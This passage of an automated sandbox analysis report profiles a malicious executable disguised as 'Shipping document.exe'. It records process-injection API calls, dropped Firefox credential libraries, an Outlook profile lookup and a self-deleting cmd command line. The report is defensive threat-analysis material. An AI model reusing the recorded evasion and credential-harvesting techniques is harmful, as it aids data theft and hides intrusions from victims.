            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212CA4 NtWriteVirtualMemory,0_2_02212CA4
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216CF9 NtResumeThread,0_2_02216CF9
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212CFE NtWriteVirtualMemory,0_2_02212CFE
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022154CA NtSetInformationThread,0_2_022154CA
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216CD1 NtResumeThread,0_2_02216CD1
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216D24 NtResumeThread,0_2_02216D24
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02210532 NtSetInformationThread,0_2_02210532
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02210538 NtSetInformationThread,0_2_02210538
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0221293C NtWriteVirtualMemory,0_2_0221293C
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02210509 NtSetInformationThread,0_2_02210509
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0221710E NtResumeThread,0_2_0221710E
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02210560 NtSetInformationThread,TerminateProcess,0_2_02210560
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02217168 NtResumeThread,0_2_02217168
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02215D6C NtSetInformationThread,NtWriteVirtualMemory,0_2_02215D6C
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216D78 NtResumeThread,0_2_02216D78
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212D7E NtWriteVirtualMemory,0_2_02212D7E
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216DA1 NtResumeThread,0_2_02216DA1
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022129BC NtWriteVirtualMemory,0_2_022129BC
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0221718B NtResumeThread,0_2_0221718B
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0221059E NtSetInformationThread,0_2_0221059E
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02212DF8 NtWriteVirtualMemory,0_2_02212DF8
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216DCD NtResumeThread,0_2_02216DCD
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_022105D6 NtSetInformationThread,0_2_022105D6
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216E1C0_2_02216E1C
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02216E1C0_2_02216E1C
            Source: Shipping document.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Shipping document.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Shipping document.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Shipping document.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-debug-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-console-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-datetime-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-debug-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-console-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-datetime-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: Shipping document.exe, 00000000.00000002.353511295.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameaarsdag.exe vs Shipping document.exe
            Source: Shipping document.exe, 00000000.00000002.354194169.00000000021D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000003.392702790.000000001EF78000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000003.396678045.000000001E508000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000000.352534561.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameaarsdag.exe vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.421657967.000000001DD90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.421825591.000000001E2A0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.418017725.00000000000E0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.418017725.00000000000E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.421623943.000000001DC40000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Shipping document.exe
            Source: Shipping document.exeBinary or memory string: OriginalFilenameaarsdag.exe vs Shipping document.exe
            Source: Shipping document.exe, 00000000.00000002.353511295.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameaarsdag.exe vs Shipping document.exe
            Source: Shipping document.exe, 00000000.00000002.354194169.00000000021D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000003.392702790.000000001EF78000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000003.396678045.000000001E508000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000000.352534561.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameaarsdag.exe vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.421657967.000000001DD90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.421825591.000000001E2A0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.418017725.00000000000E0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.418017725.00000000000E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Shipping document.exe
            Source: Shipping document.exe, 00000001.00000002.421623943.000000001DC40000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Shipping document.exe
            Source: Shipping document.exeBinary or memory string: OriginalFilenameaarsdag.exe vs Shipping document.exe
            Source: C:\Users\user\Desktop\Shipping document.exeSection loaded: crtdll.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeSection loaded: crtdll.dllJump to behavior
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@8/49@3/2
            Source: C:\Users\user\Desktop\Shipping document.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7A741079-FAE66A72-4002A979
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_01
            Source: C:\Users\user\Desktop\Shipping document.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7A741079-FAE66A72-4002A979
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_01
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\~DF3F1467CD0ED6D91D.TMPJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\~DF3F1467CD0ED6D91D.TMPJump to behavior
            Source: Shipping document.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Shipping document.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Shipping document.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
            Source: Shipping document.exeVirustotal: Detection: 50%
            Source: Shipping document.exeReversingLabs: Detection: 47%
            Source: Shipping document.exeVirustotal: Detection: 50%
            Source: Shipping document.exeReversingLabs: Detection: 47%
            Source: unknownProcess created: C:\Users\user\Desktop\Shipping document.exe 'C:\Users\user\Desktop\Shipping document.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\Shipping document.exe 'C:\Users\user\Desktop\Shipping document.exe'
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Shipping document.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
            Source: C:\Users\user\Desktop\Shipping document.exeProcess created: C:\Users\user\Desktop\Shipping document.exe 'C:\Users\user\Desktop\Shipping document.exe' Jump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Shipping document.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Shipping document.exe 'C:\Users\user\Desktop\Shipping document.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\Shipping document.exe 'C:\Users\user\Desktop\Shipping document.exe'
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Shipping document.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
            Source: C:\Users\user\Desktop\Shipping document.exeProcess created: C:\Users\user\Desktop\Shipping document.exe 'C:\Users\user\Desktop\Shipping document.exe' Jump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Shipping document.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Shipping document.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: Shipping document.exe, 00000001.00000003.396832360.000000001F830000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.1.dr
            Source: Binary string: ucrtbase.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392869610.000000001EF74000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392772745.000000001EF78000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdbGCTL source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.396832360.000000001F830000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392644017.000000001EF78000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, freebl3.dll.1.dr
